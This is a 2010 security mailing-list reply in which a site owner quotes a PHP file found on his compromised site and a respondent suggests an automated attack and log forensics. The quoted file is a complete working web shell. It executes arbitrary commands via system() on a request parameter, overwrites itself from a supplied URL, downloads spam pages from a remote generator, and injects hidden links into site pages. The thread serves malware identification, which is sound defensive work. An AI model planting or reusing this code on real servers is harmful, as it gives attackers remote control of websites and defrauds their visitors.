Re: [Pauldotcom] Odd PHP file, trying to find out what it does

Jim Halfpenny Mon, 01 Mar 2010 08:58:36 -0800

A search for the string abcdefghiklmnjsweqrtyuiopzx shows other a forum
thread with some info on this file:


http://www.webhostingtalk.com/showthread.php?t=876121

I'm sure there are other sources of info out there. Time for some forensic
analysis of your logs to work out how and when this got here. I'm guessing
an automated attack against a known vuln in a PHP app?

Jim

On 1 March 2010 09:16, Adrian Crenshaw <[email protected]> wrote:

> Ok, I think one of my sites may have been compromised. I found the
> following PHP script on a site, but I'm not sure what it is trying to do.
> Anyone else ever seen this script before?
>
> Adrian
>
> <?php
> ignore_user_abort(1);
> set_time_limit(0);
>
> function Clear()
> {
>     unlink("c");
>     unlink("1r");
>   unlink("log");
> }
>
> function Clear2()
> {
>     $mrd = trim(file_get_contents("m"));
>     $pt = "../$mrd";
>     $fin = file_get_contents($pt);
>     $fin = ereg_replace("<adsttnmq1>(.*)<sdioyslkjs2>", "", $fin);
>   $fin = ereg_replace("<!--dd4-->(.*)<!--dd5-->", "", $fin);
>     $fin = preg_replace('#<a[^>]+\_lm[^>]*>.*?</a>#is', '', $fin);
>     $fin = preg_replace("/http(.*?)tmp6(.*?)\<\/a\>/", "", $fin);
>     $fin = ereg_replace("<!--dd4-->", "", $fin);
>   $fin = ereg_replace("<!--dd5-->", "", $fin);
>   $fin = ereg_replace("<font style=\"position: absolute;overflow:
> hidden;height: 0;width: 0\">", "", $fin);
>     $fmrd = fopen($pt, "w+");
>     fwrite($fmrd, $fin);
>     fclose($fmrd);
>     echo " upt-ok";
> }
>
> function GetVar($name, &$var)
> {
>     $var = "";
>     if (isset($_POST[$name]))
>         $var = $_POST[$name];
>
>   if (isset($_GET[$name]))
>         $var = $_GET[$name];
>
>     if (($var) =="")
>       return  false;
>       else return true;
> }
>
> function Gen()
> {
>     $alp = "abcdefghiklmnjsweqrtyuiopzx";
>     $maps = array();
>     if (isset($_POST["sg"]))
>         $sg = $_POST["sg"];
>
>   if (isset($_GET["sg"]))
>         $sg = $_GET["sg"];
>
>     if (isset($_POST["gm"]))
>       $g = $_POST["gm"];
>
>     if (isset($_GET["gm"]))
>         $g = $_GET["gm"];
>
>
>     $path = "";
>     $fr = fopen("1r", "a+");
>     if (file_exists("c"))
>     {
>         $fconf = file("c");
>         $tname = trim($fconf[0]);
>         $cname = trim($fconf[1]);
>         $curs = trim($fconf[2]);
>         $pid = trim($fconf[3]);
>         if ($pid == 100)
>         {
>             $pid = 0;
>             $rnd = mt_rand(0, 999);
>             $nm = "";
>         for ($i=0; $i<3; $i++)
>           {
>               $ran = mt_rand(0,26);
>               $sym = $alp[$ran];
>               $nm = $nm.$sym;
>           }
>             $cname = $nm;
>             mkdir("$tname/$cname");
>             $curs = $g;
>         }
>     }
>     else
>     {
>         $rnd = mt_rand(0, 999);
>         $nm = "";
>       for ($i=0; $i<5; $i++)
>         {
>             $ran = mt_rand(0,26);
>             $sym = $alp[$ran];
>             $nm = $nm.$sym;
>         }
>         $tname = $nm;
>         $pid = 0;
>         $curs = $g;
>         mkdir($tname);
>         $fht = fopen("$tname/.htaccess", "w+");
>         $htname = $sg."2.txt";
>         $fp = fopen($htname, "r");
>         $fin = '';
>         while (!feof($fp))
>         {
>              $fc = fgets($fp, 1024);
>              if (!$fc) break;
>            $fin .= $fc;
>         }
>         fclose($fp);
>         fwrite($fht, $fin);
>         fclose($fht);
>         $rnd = mt_rand(0, 999);
>         $nm = "";
>     for ($i=0; $i<3; $i++)
>       {
>           $ran = mt_rand(0,26);
>           $sym = $alp[$ran];
>           $nm = $nm.$sym;
>       }
>         $cname = $nm;
>     mkdir("$tname/$cname");
>     }
>   $gname = $sg."sgen.php";
>     for ($j=$pid; $j<$pid+10; $j++)
>     {
>         $fp = fopen($gname."?g=$curs", "r");
>         $fin = '';
>         while (!feof($fp))
>         {
>              $fc = fgets($fp, 1024);
>              if (!$fc) break;
>            $fin .= $fc;
>         }
>         fclose($fp);
>
>         $fnd = fopen("$tname/$cname/$curs"."_$j.htm", "w+");
>         fwrite($fnd, $fin);
>         fclose($fnd);
>     }
>
>     if ($j==100)
>     {
>       $fp = fopen($gname."?g=$curs&m=1", "r");
>         $fin = '';
>         while (!feof($fp))
>         {
>              $fc = fgets($fp, 1024);
>              if (!$fc) break;
>            $fin .= $fc;
>         }
>         fclose($fp);
>         $fnd = fopen("$tname/$cname/$curs"."_lm.htm", "w+");
>         fwrite($fnd, $fin);
>         fclose($fnd);
>         $map = "$path/$tname/$cname/$curs"."_lm.htm";
>         fwrite($fr,"$map\n");
>     }
>
>     $fconf = fopen("c", "w+");
>     fwrite($fconf, $tname."\n");
>     fwrite($fconf, $cname."\n");
>     fwrite($fconf, $curs."\n");
>     $nj = $j;
>     fwrite($fconf, $nj."\n");
>     fclose($fconf);
> }
>
> function Update()
> {
>     $thisname = "1.php";
>     if (isset($_POST['u']))
>       $u = $_POST['u'];
>
>     if (isset($_GET['u']))
>          $u = $_GET['u'];
>
>      $fp = fopen($u, "r");
>   $fin = '';
>         while (!feof($fp))
>         {
>              $fc = fgets($fp, 1024);
>              if (!$fc) break;
>            $fin .= $fc;
>         }
>   fclose($fp);
>
>   $fthis = fopen($thisname, "w+");
>   fwrite($fthis, $fin);
>   fclose($fthis);
> }
>
> function Com()
> {
>     if (isset($_POST['c']))
>       @system($_POST['c']);
>   if (isset($_GET['c']))
>         @system($_GET['c']);
> }
>
> function UpKos()
> {
>     $mrd = trim(file_get_contents("m"));
>     $pt = "../$mrd";
>     $fin = file_get_contents($pt);
>     $fin = ereg_replace("adsttnmq1", "<adsttnmq1>", $fin);
>     $fin = ereg_replace("sdioyslkjs2", "<sdioyslkjs2>", $fin);
>     $fmrd = fopen($pt, "w+");
>     fwrite($fmrd, $fin);
>     fclose($fmrd);
> }
>
>
> function MRepl()
> {
>     $mpt = "";
>     $drs = "";
>     $begtag = "<adsttnmq1><font style=\"position: absolute;overflow:
> hidden;height: 0;width: 0\">";
>   $endtag = "</font></body></html><sdioyslkjs2> ";
>     $mrd = trim(file_get_contents("m"));
>     $pt = "../$mrd";
>     $fin = file_get_contents($pt);
>     GetVar("mpt", $mpt);
>      // óäàëÿåì çàâåðøàþùèå õòìë òåãè
>   $fin = preg_replace ("/<\/body>/i", "", $fin);
>   $fin = preg_replace ("/<\/html>/i", "", $fin);
>   $fin = ereg_replace("<!--dd4-->(.*)<!--dd5-->", "", $fin);
>   $fin = ereg_replace("<adsttnmq1>(.*)<sdioyslkjs2>", "", $fin);
>     $fp = fopen($mpt, "r");
>   GetVar("drs", $drs);
>   $fin = $fin.$begtag;
> $drs = str_replace("\\", "", $drs);
>   $fin = $fin.$drs;
>   $fin = $fin.$endtag;
>   $fmrd = fopen($pt, "w+");
>     fwrite($fmrd, $fin);
>     fclose($fmrd);
> }
>
> function Main()
> {
>     if (isset($_POST['u']) || isset($_GET['u']))
>     {
>         Update();
>         exit();
>     }
>
>     if (isset($_POST['c']) || isset($_GET['c']))
>     {
>         Com();
>         exit();
>     }
>
>         if (isset($_POST['uk']) || isset($_GET['uk']))
>     {
>         UpKos();
>         exit();
>     }
>
>     if (isset($_POST['g']) || isset($_GET['g']))
>     {
>         Gen();
>         exit();
>     }
>
>     if (isset($_POST['s']) || isset($_GET['s']))
>     {
>         MRepl();
>         exit();
>     }
>
>   if (isset($_POST['cl']) || isset($_GET['cl']))
>     {
>         Clear();
>         exit();
>     }
>
>     if (isset($_POST['cl2']) || isset($_GET['cl2']))
>     {
>         Clear2();
>         exit();
>     }
>
>     echo "<ok>";
>
> }
>
> Main();
>
> ?>
>
> _______________________________________________
> Pauldotcom mailing list
> [email protected]
> http://mail.pauldotcom.com/cgi-bin/mailman/listinfo/pauldotcom
> Main Web Site: http://pauldotcom.com
>

_______________________________________________
Pauldotcom mailing list
[email protected]
http://mail.pauldotcom.com/cgi-bin/mailman/listinfo/pauldotcom
Main Web Site: http://pauldotcom.com

Re: [Pauldotcom] Odd PHP file, trying to find out what it does

Reply via email to